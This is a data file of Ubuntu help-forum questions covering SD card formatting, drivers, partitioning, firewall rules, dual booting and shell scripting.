466300	can not format micro sd card	i apparently did something wrong while trying to format my micro sd card 8 gb . i have used it for one and a half year in my old phone without any problems and now i wanted to format it to use in my new jolla phone . my old phone says it 's damaged , ubuntu does n't mount the card , neither does windows 7 btw . neither can format it . here 's the result of the last try : i opened gparted and let it look for the card . it detected and mounted it , but it takes an awfully long time finding the partitions on the card . i closed gparted and tried to see if i could write to the card . that seemed to be possible , but at the next time mounting the file was gone . i tried to unmount the card through nautilus but i got the message that files were being written to the device and i have to wait . light on the usb reader kept blinking fast . after some time i got the following error : error ejecting /dev/sdb : command-line eject `` /dev/sdb '' ' exited with non-zero exit status 1 : eject : unable to open/dev/sdb ' . i pulled out the card and plugged it in again . now the computer recognizes it immediately , but as i pointed out before , the document was gone . this time gparted recognizes the device as a device with one fat32 partition . i unmounted the card , which took again very long . i tried to format it as ext4 , which gave me en error in the last phase , saying : errors while writing superblocs ( translated from dutch , not sure if this the exact same error in english ) . does anyone know what went wrong ? i did manage to change the file system , apparently , but it still does n't work the way it 's supposed to . or is this sd card just ruined ?
466308	unable to change and edit my hard-drives partitions	i have got 130 gigabytes of my 500 gigabyte mac hard-drive partitioned for ubuntu i ca n't edit the partitions right now . if i was to uninstall ubuntu , would i be able to use/edit the 130gb that was partitioned ?
466309	freenx server installation on ubuntu 14.04 trusty	trying to install freenx-server on trusty is always failing with dependency on nxagent ***root @ xxxxx-unix : /downloads # dpkg -i freenx-server_0.7.3.zgit.140303.1848.e81c1e4-0~ppa2~trusty_i386.deb selecting previously unselected package freenx-server . ( reading database ... 169875 files and directories currently installed . ) preparing to unpack freenx-server_0.7.3.zgit.140303.1848.e81c1e4-0~ppa2~trusty_i386.deb ... unpacking freenx-server ( 0.7.3.zgit.140303.1848.e81c1e4-0~ppa2~trusty ) ... dpkg : dependency problems prevent configuration of freenx-server : freenx-server depends on nxagent ( > = 2.1.0-0 ) ; however : package nxagent is not configured yet . dpkg : error processing package freenx-server ( -- install ) : dependency problems - leaving unconfigured processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : freenx-server***
466312	get quotes for stock prices in gnucash using finance : :quote	i have followed the instructions here , using the exact example , to have automatic stock price updates in gnucash . when i click price editor - > get quotes it returns in a warning unable to retrieve quotes for these items : ns : hdil.ns ( also there is another one i tried too ) . i installed gnc-fq-update following the instructions on the gnucash mailing list here . and when i type into the terminal cpan -d finance : :quote as instructed to do so in the gnucash wiki for cpan the terminal returns going to read '/home/anthony/.cpan/metadata' database was generated on wed , 14 may 2014 02:06:11 gmt finance : :quote -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ( no description ) e/ec/ecocode/finance-quote-1.31.tar.gz /usr/local/share/perl/5.14.2/finance/quote.pm installed : 1.31 cpan : 1.31 up to date erik colson ( ecocode ) eco @ ecocode.net
466316	upgrade from ubuntu 8.04 lts with an old computer	i have an old dell latitude d610 , 500mb ram , and a 11 gb partition available for linux ( a 30 gb partition is full with data , and on a 15 gb partition i still have windows ) . i have it still running on 8.04 lts . as this is no longer supported i would like to update it . upgrading to 10.04 lts failes as it askes me for 5 gb of free disk space which i do n't have . what options do i have with my computer and how should i proceed ?
466318	fujitsu lifebook ah532 problems	i 'm new to ubuntu . i have lubuntu 13.10 32-bit on my fujitsu lifebook ah532 laptop , and i have these problems in ubuntu : my touchpad is working , but i ca n't use it for scrolling , etc . i ca n't power off my wifi by pressing fn + f5 . i think its fan is n't working correctly because my laptop is too warm ! : ( thank you .
466323	ca n't access logitech c930e ( webcam ) under ubuntu with simplecv	ubuntu wo n't recognize my new logitech c930e webcam fully . guvcview does ( see below ) . logitech says it supports uvc 1.5 . i found : http : //sourceforge.net/p/linux-uvc/mailman/message/31645720/ why is n't it integrated in ubuntu 14.04 ( cheese app ) ? i need this camera for simplecv ( which wo n't recognize it as well ) . i figured out : cam = camera ( 0 ) // - > for the internal notebook ( edge 130 ) webcam cam = camera ( 1 ) // - > for the logitech c930e i receive following errors : simplecv:1 > cam = camera ( 1 ) vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument and with an opencv command : simplecv:2 > cap = cv2.videocapture ( 1 ) vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument vidioc_querymenu : invalid argument libv4l2 : error setting pixformat : device or resource busy highgui error : libv4l unable to ioctl s_fmt libv4l2 : error setting pixformat : device or resource busy libv4l1 : error setting pixformat : device or resource busy highgui error : libv4l unable to ioctl vidiocspict
466325	how do i set up a wacom cintiq on 14.04 ?	this is my first post and i 'm really not a proper linux/ubuntu operator at all . just an enthusiast with all the technical skill you 'd expect of an arts grad . so please , go easy on the new guy . anywayâś i 'm running 14.04 dual-booting on a 2011 macbook pro and i 'd quite like to set up a wacom cintiq 13hd . 14.04 seems to come with drivers for the cintiq , which i can see in the settings , but when i rig it up , i can only get it to work as a second screen . the stylus does n't work at all , nor to the additional buttons , and when i try to change things in the setting , it tells me `` tablet not detected . '' i gather that it 's detecting the cintiq as a screen , but not as a tablet . which is a tad annoying , as you might well imagine . does anyone out there have a solution ? by the way , if you 're going to ask me what drivers i have or other details , you might have to tell me how to find them . as i say , not really a linux operator , but very keen to learn !
466326	ufw is not working properly	i 'm trying to enable ufw in remote ubuntu server . this server has two lxc container running . one container has nginx server running and i have hosted web application , right now every thing is working fine . i did port forwarding to access webapp of container from local system . i wanted to allow only 80 and 22 to be accessible through firewall , remaining all wo n't be allowed . these are the rules i did # ufw status verbose status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) , deny ( routed ) new profiles : skip to action from -- -- -- -- -- -- 22 allow in anywhere 80 deny in anywhere 22 ( v6 ) allow in anywhere ( v6 ) 80 ( v6 ) deny in anywhere ( v6 ) after i enable the firewall with port 80 deny i still be able to access the webapp of the container . # iptables -t nat -l chain prerouting ( policy accept ) target prot opt source destination dnat tcp -- anywhere anywhere tcp dpt : http to:10.0.3.2:80 chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination masquerade all -- 10.0.3.0/24 ! 10.0.3.0/24 again to check whether firewall is working or not i tried use scp , scp will use port 21 . as my firewall in ubuntu server is enable i should n't allow to copy file to server but i can able to copy files . check this # scp /home/attributes123.csv root @ myserver : /home/ root @ myserver 's password : attributes123.csv 100 % 0 0.0kb/s 00:00 so my firewall setup is not working . any idea why it is not working ? i did reboot after enable firewall but no luck .
466327	nvidia dual display setup	i have struggled to get my displays working properly after a botched attempt to upgrade from 12.04 to 12.10 . currently , i have one display working . here is some information about what is installed . i do n't really know how to proceed : system tools : displays only shows one monitor , called `` laptop '' . this is a desktop fwiw . i 'd like to have both monitors back . nvidia-settings says i am not using the nvidia driver . it says to `` run nvidia-settings as root and restart x-server '' , which i did . no change in symptoms . nvidia-settings does not look like it is supposed to - there is no x-server information on the left side panel , something is definitely not right here . i am apparently using `` additional drivers '' from nvidia according to software sources in ubuntu software center , and am using `` the recommended driver '' nvidia binary xorg from nvidia-current ( proprietary , tested ) $ xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 400 , current 1280 x 720 , maximum 1280 x 720 default connected 1280x720+0+0 0mm x 0mm 1280x720 0.0* 800x600 0.0 640x480 60.0 640x400 0.0 320x400 0.0 $ lspci | grep -i nvidia 02:00.0 vga compatible controller : nvidia corporation g98 [ quadro nvs 295 ] ( rev a1 ) here is the `` device '' section of xorg.conf which seems to have some relevance : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection i know just enough to know this stuff ai n't right but not enough to fix it ! what steps should i take to get my dual monitors back ?
466328	symlink error `` this location could not be displayed ''	just upgraded to 14.04 ( and it was n't super easy , had a number of issues to fix ... ) i have a few external hard drives with video files . in my ~/videos/ directory i had symlinks to those drives created by using the ln -s command . before the upgrade , they were working fine . after the upgrade i 'm getting an error '' this location could not be displayed . you do not have the permissions necessary to view the contents of 'drive name ' . i get the same error for all three drives . if i create a symlink to a local directory it works fine . right clicking on the symlink and selecting `` properties '' tells me link target : /media/drive name/ ( which looks right ) , and says contents : unreadable . i 've tried deleting & recreating the links , with no change . i have also turned on the `` local network share '' folder sharing , but i do n't know that that makes any difference . ( i turned it on to share with the network , not to fix this problem ) the drives seem to be working perfectly . when i click on them under `` devices '' i can view them and use the files like normal . when i click on the symlink i get the error , then a blank page . i do n't know if this is a symptom of the system upgrade having problems , the newer version just doing things differently , or a new bug . i 'm comfortable with it , but new to ubuntu - so i really appreciate any help that can walk me through the solution , as i do n't yet know what diagnostic tools or strategies are available : )
466331	mathematica 8 choppy surface plots on ubuntu 14.04	using mathematica 8 on ubuntu 14.04 . while generating sphericalplot3d with colorfuntion the rendered graphics is very choppy . the smooth color variation seems pixelated . initially on rotation the graphics was disappearing but running mathematica with mathematica -mesa solved that problem . however graphics is still choppy .
466334	suddenly localhost or ( 127.0.0.1 ) not pointing to /var/www	i think it is after installation of tomcat , my localhost showing empty directory on browser and localhost/anyproject showing `` not found '' . and localhost:8080 properly showing tomcat index page .
466337	super + d ubuntu 14.04	i have set from to minimize all windows settings to super + d button . some time later this super + d button does not works . when i check the setting i see that it is disabled . what should i do not to disable itself after a time ?
466344	can i use my razer naga hex on ubuntu ?	i am thinking to use ubuntu , i only have one mouse , razer naga hex . im just asking if i can use my mouse , and i configure my mouse on ubuntu , it only says `` compatible with windows and mac '' on the side of my box .
466345	mongo driver php - ca n't install [ sasl.h not found ! ]	i ca n't install mongo driver into my ubuntu development system . when i run the command sudo pecl install mongo i got this error : configure : error : sasl.h not found ! error : `/tmp/pear/temp/mongo/configure -- with-mongo-sasl=n ' failed i do n't know who to fix or resolve my issue . please give me some help . many thanks
466348	can i increase my hard disk space in virtual box which is running windows 7 currently ?	i have my first attempt to install an os using virtual box and for that i made a 25 gb partition to my hard disk and now i want to increase its size . is that valid , and if yes , how can i do it ? enter image description here this is the current status of my virtual machine . i have another question regarding 3d settings for windows 7 which is installed in virtual box . can virtual box support 3d games this is shown when i type the given commands in terminal
466352	i have formatted an external hd in ext4 . but now i want all my linux pcs to be able access it	i am using xubuntu 14.04 amd64 . i just bought an external hd . i have wiped everything in it and formatted to ext4 the whole disk . now the only owner is root , i can not create folders or copy contents on it . but i want all my linux boxes , ( some of them not with the same user name i have in the computer that formatted the hdd , as i sometimes use my brother 's computer or some other computer ) to be able to access and create / delete contents on it . how do i change permission access on the dh to allow any of my linux computers to delete and create contents of this new hd ? this disk appears as sdc . thanks alex
466353	config -- no-log for an init deamon job	i have a proccess configured under /etc/init and it runs by the init deamon , and want this proccess to stop sending logs to the /var/log/upstart dir . i read this document : https : //wiki.ubuntu.com/precisepangolin/releasenotes/technicaloverviewupstart # a -- no-log but couldnt understand the usage , how do i set the -- no-log uption for an init procces ? thanks
466356	how to exclude recipients from recipient list from composition window in thunderbird 24	i want to compose a mail and send it to a list ( e.g . with 20 addresses ) and remove a and b from the list of recipients ? how can i do that ( as easy as possible ) from the composition window ? i search for possibilities to dereference the list , i.e . not add listx , but c , d , e , ... in listx ( with an acceptable low number of clicks ) . i know that i can do what i want by copying mail addresses from the addressbook , but this is inacceptably complicated and should not be part of the solution i 'm looking for . solutions referencing ( stable ( with version 24 ) ) extensions are welcome : )
466361	13.10 update-manager changed behaviour	just after trustytahr has been launched , the update-manager had the option to upgrade from 13.10 to 14.04 , but now that i finally want to proceed with this upgrade the update-manager does not have this option anymore and even if i try to update from the commnad line i receive the following message `` no new version founded '' .
466363	change the main sound output	usually i use my headphone to listen a music ( using the front port one ) . sometimes , i plugged out the headphone jack , if i want to listen by speaker ( using the back port ) . now my question is , can i change the output without unplugging my headphone jack .
466364	add a call function to modem-manager-gui	modem manager gui is very helpful tool for edge/3g/4g modem specific functions control . i am using modem-manager-gui 0.0.16-2 with ubuntu 14.04 : it has very useful functions like sms , ussd , traffic , limit data , etc . but there is not any call function . so , can it facilities with call function ?
466366	is there a command to view hard drive specs	i noticed that my ubuntu is lagging extremely badly but only the first time i do things after what i did gets loaded into ram the lag stops totally . i ran some tests and i guess one of my laptop hard drives is borked . im assuming that i have to replace the drive , is there some command i can issue to see the exact specs on the drive so i can then buy it online ? i do n't want to have to open up the laptop , find the specs . then open it again when the new drive arrives .
466368	ubuntu 12.04 black screen after login	i 've just installed ubuntu 12.04 on a single board pc nano-9452-r10 from an usb pen drive . after the installation i rebooted the pc . the purple screen with the ubuntu logo appeared as the os was loading and the login mask appeared . i wrote the password , hit enter and then ... the screen went black . i tried the combination alt + r_sys + r e i s u b and the pc rebooted . then again , after the login , the screen went black . this time i tried to open a terminal by hitting ctrl + alt + t and i typed blindfold sudo reboot after typing the super-user password the pc rebooted . i think that ubuntu does n't recognise the monitor after the login , or sets as the default monitor something that does not exist . my question is : how can i change the monitor by typing `` blind '' commands on the terminal ? thank you !
466370	problem with touchpad in ubuntu 14.04	my acer aspire 4739 touchpad is not working after installing ubuntu 14.04.but i can use external mouse device .
466371	intel turbo boost on ubuntu 14.04	well , i have a toshiba laptop with an intel i5 2430m and 4 gb ram installed . i have intalled the i-nex so to know my cpu frequency at every time . but there is a problem : even when i 'm editing a video , the cpu runs at 2.4gh with 80-100 % cpu load ! but the intel turbo boost technology does not get enabled , while when i was using windows , these things were happening automatically ! so , how can i enable the turbo feature ? this feature is enabled in bios settings edit : i think that this could help , but i 'm not so sure : cpu turbo boost : modify temperature limit under 14.04
466373	how to pause with specific time between two command in script ?	i want to do such as following : # ! /bin/bash command1 pause 30 seconds command2 exit this is only example script with pause of 30 seconds between run of 2 command . how to do this ?
466375	ubuntu 14.04 lock screen keyboard error	after locking ubuntu 14.04 x64 desktop edition , the usb and built-in keyboards do not work on the login screen . when clicking on password area nothing happens . but if i hit ctrl + alt + f1 and goes to terminal 1 , keyboard works . i tried to restart sudo service restart lightdm but still the login screen password fill is acting like the keyboard is not working . what could be causing this ?
466377	how to use sleep , wake and power keys as media keys ( volumeup , volume down etc ) in ubuntu 14.04 ?	i have an usb keyboard with sleep , wake and power keys but no media keys . in ubuntu 12.04 i used xmodmap to remap this keys as xf86audiomute , xf86audiolowervolume and xf86audioraisevolume . this is how it was done : .xmodmap in user 's home directory : keycode 124 = xf86audioraisevolume keycode 150 = xf86audiomute keycode 151 = xf86audiolowervolume` .xinitrc in user 's home directory : xmodmap ~/.xmodmap as far as i remember it was enough to use sleep , wake an power keys as media keys ( mute , volume down , volume up ) . now i have fresh install of ubuntu 14.04 and this approach yields no result . xev recognizes new mappings , but these keys still do not work as media keys . example of xev output for power key : keyrelease event , serial 78 , synthetic no , window 0x4000001 , root 0x25d , subw 0x0 , time 3802034 , ( 1198,451 ) , root : ( 1228,573 ) , state 0x10 , keycode 124 ( keysym 0x1008ff13 , xf86audioraisevolume ) , same_screen yes , xkeysymtokeycode returns keycode : 123 xlookupstring gives 0 bytes : xfilterevent returns : false i have tried different usb keyboard which does have media keys and they work as expected . example of xev output for `` volume up '' key on keyboard with media keys : keyrelease event , serial 79 , synthetic no , window 0x4000001 , root 0x25d , subw 0x0 , time 4268348 , ( 810,191 ) , root : ( 961,347 ) , state 0x10 , keycode 123 ( keysym 0x1008ff13 , xf86audioraisevolume ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false clearly i do n't understand something here and i 'm asking for help . p.s . i have disabled default functionality of sleep , wake and power keys by setting org.gnome.settings-daemon.plugins.power.active = false org.gnome.settings-daemon.plugins.power.button-hibernate = nothing org.gnome.settings-daemon.plugins.power.button-power = nothing org.gnome.settings-daemon.plugins.power.button-sleep = nothing org.gnome.settings-daemon.plugins.power.button-suspend = nothing through dconf-editor . p.p.s . my first move was to use ubuntu 's system settings . while it seems to have the ability to set other keys as media keys , it does n't work , at least on my system .
466383	nautilus connect to server in ubuntu 14.04 fails to connect to iseries v5r4	i have been successfully using the ( excellent ) nautilus 'connect to server ' feature for some time prior to ubuntu 14.04 to access network drive shares on ibm iseries ( as/400 , ibmi , i5 ) running os/400 at versions of v5r4 and v7r1 . having installed ubuntu 14.04 recently i find that i can still connect to an iseries running at v7r1 , but when i try and connect to a system running v5r4 i get an error message : oops ! something went wrong . unhandled error message : failed to mount windows share : connection timed out this had previously worked on all versions from 12.04 up to and including 13.10 . i am running files version 3.10.1 . since our main development box is v5r4 this turns out to be quite a problem for me . additionally , i thought i could get round it using ftp via nautilus . this does work ( a bit slower ) but what happens is that if the file was changed over a year ago , then the file name is preceded by a space ! sounds odd , but i have looked carefully and the link seems to be the modified date . if the file has been changed this year , then the year is not given on the modified date and the file name is fine . if the file was change in 2013 or before then the year appears on the modified date and the file name has a space in front of it . needless to say that this causes quite a few problems . however , this problem also happens in 13.10 ( now that i try it ) . it is also true that filezilla does not have this problem . i could use that , and although it is very good , it does n't work quite as well as nautilus does for a straight forward file manager . thoughts , comments or sympathy welcome . thanks in advance .
466385	ubuntu 14.04 window problem after waking up from suspend	i have a new hp z book 15 and i terminated windows and installed ubuntu 14.04 . all are working fine except that at certain times when i suspend the laptop and log back in again , the window panels get blank . here is the image of how it looks after logging back in after a suspend . it happens all the time but only after two or three suspends . i know that this is a question that can not have a direct answer ( or maybe it does ! ! ) as i do n't have any details that i can provide to explain further than the image itself .
466387	replacing hardrive ( laptop )	my laptop has 2 hd 's . one broken , one not broken . can i replace a hdd with a ssd ? i noticed by using the smartctl command that my ssd is twice as fast ! and my hdd is broken so i want to replace it with a ssd ? but im scared that they use different cables or the ssd wont fit into the laptop ? should i just be safe and by the same exact hdd that i had in the first place ? my plan was to buy another ssd ( intel ssdsc2cw240a3 ) and replace the broken hdd ( wdc wd10jpvt-55a1yt0 ) this question -- > i think about adding a second hard drive to my laptop is similar but doesnt seem solved : ( edit : end game is clearly to install ubuntu on the new drive . i hope others are helped by this : )
466389	ubuntu 14.04lts hangs when i change brightness of my display on dell n5010 laptop	i have dell n5010 my system hang when i try to change brightness of the display and this happen only when my system on battery please help how to solve this problem
466392	remmina or other rdp client with shorcuts in the menu bar - ubuntu 14.04	i 'm using remmina in ubuntu 14.04 and i have a lot of rdp connections to windows servers . i wanted to know if there 's any way to have a list of the rdp connections in the menu bar for quick access . maybe there 's another rdp client with this funtionality . thanks ! r
466395	how can i create a quick launcher in lubuntu ?	how can i set up quick launchers in lubuntu ? i 've installed lubuntu 14.04 . now i see no way to set quick launchers , especially for programs not listed in the menu ( which must be started from a terminal ) .
466396	adding an auto-refresh rate to a startup application	i work for the it dept of an airport and we use 14.04 for our live view of tracking flights . i have the flight tracker scheduled to start 10 seconds after boot , but i would like to add an auto-refresh rate of 5 minutes to the program to keep track of flights and in case there is a moment where connection to the internet is temporarily down . how would i do this ? i have researched and found how to delay the startup application but ca n't find a script for an auto-refresh do the program has autorefresh features ? that 's an application feature , noting to do with ubuntu . – braiam 3 hours ago no it does not . before it was connected to windows xp and had to have an html file targeting the application to give it an auto-refresh . i 'm new when it comes to adding bash scripts for html to ubuntu . but here is the html file that was xp : – scros6y 3 hours ago my question is in bash would this be the same ? or would there be a different way to set this up ? – scros6y 3 hours ago looks like a on-line application , is this `` app '' run in a web browser ? – mateo 3 hours ago yes its an app that we run inside a browser . basically its a live view of flights incoming and outgoing . previously , through ie but now through chrome – scros6y 3 hours ago 1 this is independent of your operating system , you can use the exact same approach . nothing to do with bash . – terdon 3 hours ago 1 but you could write a small script to auto open that web page every so often right ? maybe chrome in kiosk mode ... – mateo 3 hours ago would i need to place the html as a startup or just place it in my home directory ? – scros6y 3 hours ago i have it set now to open in chrome in kiosk mode – scros6y 3 hours ago i replaced the web app file with the html file and this seems to have done the trick ! thank you ! – scros6y 21 mins ago
466397	toshiba satellite integrated graphics	well , i am using ubuntu 14.04 in my toshiba satellite l750-1gn , which come with an intel i5 2430m . the processor has an integrated graphics card , the hd 3000 . but both in windows and linux this `` card '' is not recognised ! it only recognises the nvidia gt520m graphics card . why is this happening ? is , maybe , a toshiba 's preset ?
466402	how to make a bootable cd of ubuntu 12.04 lts ?	i wan to take a laptop with dos only . i want a ubuntu 12.04 boot-able cd do that i can boot my system at any time whenever needed . how can i make a boot-able cd ? can you please tell me the complete procedure for that ? thanks in advance .
466404	my reliance netconnect+ is not detected in ubuntu	i recently bought my new dell 3537 with ubuntu and i 'm a new user of ubuntu.i want to connect my reliance net connect+ modem to the laptop , but it is not detecting it.how can i get rid of this problem ? ( without involving wifi )
466406	ubuntu disk partition	well , i recently installed ubuntu 14.04 in a hdd of 640 gb capacity . after the installation , i decided that i should partition my hdd so to have on the one partition the os and some other files ( 320 gb ) and save to the other partition my video-edit works ( 320 gb ) . and i did so using the ubuntu 14.04 live cd and gparted . i formatted the new disk part `` with '' ext4 . but then something wird happened : while i am using ubuntu without any problem , i can not edit the second partition , which means that i ca n't save or create something there ! ubuntu says that i am not the owner ! ! why ? ? i need to solve this immediately ! edit : both of these two solutions below worked for me ! however , faster way proved to be the one i have chosen !
466409	black screen after upgrade at ubuntu 14.04	i upgrade of ubuntu 13.10 to 14.04 , all the upgrade was sucessful , no problems , but when i enter in the ubuntu 14.04 , i just found a black screen , no more just a black screen . how i can fix it , thank you
466411	evolution plugin for exchange missing in 14.04	just upgraded from 12.04 which evolution contained a plugin for ms exchange . can anyone tell me where i can download that plugin for 14.04 ? unfortunately , the mail servers i use do not support imap or pop , so exchange is my only option .
466417	gnome gmail not working in unity	i am trying to set gmail as the default email application in my ubuntu 14.04 lts . right now , the only option available at : system settings - > details - > default applications - > mail is thunderbird mail . another post ( making google calendar and gmail the `` default applications '' for calendar and mail ) suggests to install the gnome gmail package from http : //sourceforge.net/projects/gnome-gmail/files/version_1.8.2/ . i still do n't see the gmail option after installing it . any solution ?
466418	is it good to install windows after or before ubuntu ?	actually , i am using ubuntu system and i want to install windows . so which one is better ? installing ubuntu before windows or windows before installing ubuntu ? can you please clarify which method works ?
466430	open lid to wakeup the system , get white screen	i got a new dell m3800 laptop and i use gentoo+fvwm in /etc/acpi/lid.sh , i use echo -n mem > /sys/power/state to let the system sleep when the lid is closed . the problem is when i open the lid , i got a white screen . i need to do ctrl+alt+f1 to go the console then ctrl+alt+f7 to go back to fvwm to eliminate the white screen . i check the demesg and i found the following errors [ 2779.734885 ] pciehp 0000:00:1c.0 : pcie04 : link training error occurs [ 2779.734886 ] pciehp 0000:00:1c.0 : pcie04 : failed to check link status [ 2779.734986 ] dpm_run_callback ( ) : pnp_bus_resume+0x0/0xa0 returns -19 [ 2779.734987 ] pm : device 00:08 failed to resume : error -19 [ 2779.782972 ] tpm_tis 00:0c : tpm is disabled/deactivated ( 0x6 ) does anyone have any ideas how to solve the problems . thanks .
466432	where to configure which calendar is displayed by the default time & calendar indicator applet ?	i recently upgraded to 14.04 and i love it . one thing is bothering me though : i notice that the default time & calendar indicator applet now displays calendar events . it 's currently showing events from my google calendar account . the thing is , i do n't remember configuring this anywhere , and i ca n't see where it 's getting my credentials from . how is the applet logging in to my google account ? i do n't have evolution installed and i 've not added my account details to on-line services under settings . the google calendar web app has not been configured either . i guess this must be a gconf setting from a previous version of ubuntu . any ideas how i can change the config ? thanks..
466434	can windows 7 installed in virtual box suppot 3d graphics for gaming	i have recently installed windows 7 in my virtual box and my main os is ubuntu 14.04 lts . i have gallium 0.4 on amd rs-780 . can i get a stepwise manual to install graphic card accelerators required to enable high quality gaming in virtual box ? this is the status of my computer .
466438	should i put /boot on ssd or hdd	i am running lubuntu 14.04 64bit . i am planning to implement enhanceio to use my new 25gb ssd drive for caching my 4tb raid 0 array . the raid array is partitioned as : 500mb /boot , 20gb / , 200gb /vmware , and 3.4tb /home . i understand there are issues/complexity with caching root partitions , so i 'm thinking of making a 500mb /boot partion on the ssd . my question , will it make a difference putting /boot on the ssd ? this system is on 24/7 , and really only gets rebooted once every few months . i 'm thinking the kernel is the only thing getting loaded from the /boot partition , and it likely will stay entirely in memory . so having the /boot on ssd wo n't make any difference on a running system . is my thinking correct ?
466439	uninstalling wine software - superantispyware	i was wondering if anyone knew of a command for the terminal to uninstall the program `` superantispyware '' that i installed through wine on ubuntu 14.04 lts using wine ; i attempted to do by using `` uninstall wine software '' but the program does not show up on the list .
466445	what is masquerade in the context of iptables ?	in iptables many times i see the target masquerade . what is that . i searched and find lots of things . but i need some one explain me what masquerade is in a so easy way ? **if you bring an example thats will make it so better if you know and search for example your example can be this.sudo iptables -t nat -a postrouting -o eth0 -j masquerade from here
466455	unable to resize partition	i 'm trying to resize a partition but when i boot from the livecd and open gparted it says minimum size 113680 max size 113716 . it is a primary partition , and at install i told the installer to use lvm to make it easier to partition later .
466459	failed installation 14.04 lts due to computer hanging	while i was upgrading my os from 13.10 to 14.04 lts , the computer hung for an hour , so i was forced to shut down . when i restarted the computer i had a black screen with several error message saying : `` unable to mount '' . how can i manage this problem . to run the computer and recover my files i have installed 12.10 now in parallel to unfinished 14.04 lts , from which i am working now .
466460	audio drivers for lenovo z510	i just installed ( dual boot ) ubuntu 14.04 in my new lenovo z510 ideapad which originally came with a windows 8.1 . my jbl speakers do n't seem to work as well as in windows . so i 'm looking for linux drivers for the same . tried to find it , but could n't .
466461	webcam not working on sony vaio pro 13 on ubuntu 14.04	yesterday i installed ubuntu 14.04 on my brand new sony vaio pro 13 , you can find the specifications here . apparently no one had issues with the webcam before when using 13.10 or 13.04 . so , as a new ubuntu user i would like to know how to solve this problem . update lsusb result bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 005 : id 04f2 : b42a chicony electronics co. , ltd bus 002 device 002 : id 0eef : a108 d-wav scientific co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lspci result 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation wireless 7260 ( rev 6b )
466465	how do you repair a non-booting windows 8.1 installation after updating to ubuntu 14.04 ?	i have dual boot set-up with windows 8.1 ( original os ) and ubuntu 14.10 . recently , windows stopped booting . i am presented with a 'recovery ' screen with the error code : 0xc0000225 . windows stopped working around the same time that i upgraded from 13.10 to 14.04 . how do i repair the windows partition ? also , i think i used to have a 'recovery ' options available in the grub menu . however , i attempted to run boot-repair first and now i only have 4 options : ubuntu ubuntu with advanced options windows system setup is there a way to return the 'windows recovery ' option to the grub menu ?
466467	ubuntu installation on a hybrid hd with little ssd space	i 've just bought my ultrabook lenovo flex 14 8gbssd 500hdd . i want ubuntu 14.04 as the main os running on ssd . i used and installed ubuntu 12.04 , 13.04 and now 14.04 on my old notebook , but i do n't know how to do the installation properly now on this hybrid . i simply do n't know what to do and how to do it : 1 ) what should i put on ssd and what should i put on hdd ? e.g . should i put \home on ssd or on hdd ? 2 ) how to do this ? i can make ubuntu run on my pendrive but do n't know how to do the installation properly . i 've tried to do a simple installation , erasing w8 but it did n't work . i only saw tutorials about double boot , but i will run windows on virtualbox , so the problem is how to install ubuntu properly on ssd . i 've tried to install ubuntu erasing win8.1 , but it was taking much time , then i aborted it . now when i choose âsomething elseâ in installation it shows : /dev/sda free space size : 1mb /dev/sda1 efi size:536mb used:33mb /dev/sda2 ext4 size:495367mb used:11152mb system : ubuntu 14.04 lts /dev/sda3 swap size:4201mb used:0mb free space size : 1mb ; device for boot loader installation : /dev/sda ata st500lm000-1ej6 ( 500.1gb ) ; /dev/sda1 ; /dev/sda2 ubuntu 14.04 lts ( 14.04 ) ;
466468	how can i extract user data from a file with awk and create a new user based on it ?	i need somebody who could help an exercise . i can only use shell scripting and awk to do it : you have a text file called users.txt with this info inside : users.txt : peter:7777 : /home/store ; quinn:7777 : /home/accounts ; david:7777 : /home/secondstore ; daniel:7777 : /home/address ; the script should create an user using the first word of each line , the second word of each line will be used as password , and the third one as the home directory . i would be very grateful if anybody can point me in the right direction
466469	maas - use different preseeds-scripts based on zone or tag	i would like to use different preseeds-scripts based on the maas zone . but i think this is n't possible at the moment , maybe there is another solution how to use different preseeds-scripts based on tags or something similar ? the documentation did n't show any example or information if it 's possible . thanks for your help !
466471	where should i put compiled binaries so that the would become searchable ?	i 'm compiling software from source . this software project does n't come with an installer , so i just put the binary in /usr/local/bin , then i can start it from the terminal with a command software & where should i put the binary so that it would become searchable in ubuntu 's ? ( finder ? search ? thingy which is in the upper left corner by default )
466475	not showing option to boot from thumb drive in grub	i have a tails thumb drive . i used it with windows but i ca n't figure out how to get grub to boot from the thumb drive when i have it installed . my boot menu only gives me the options to run gnome or ubuntu lts .
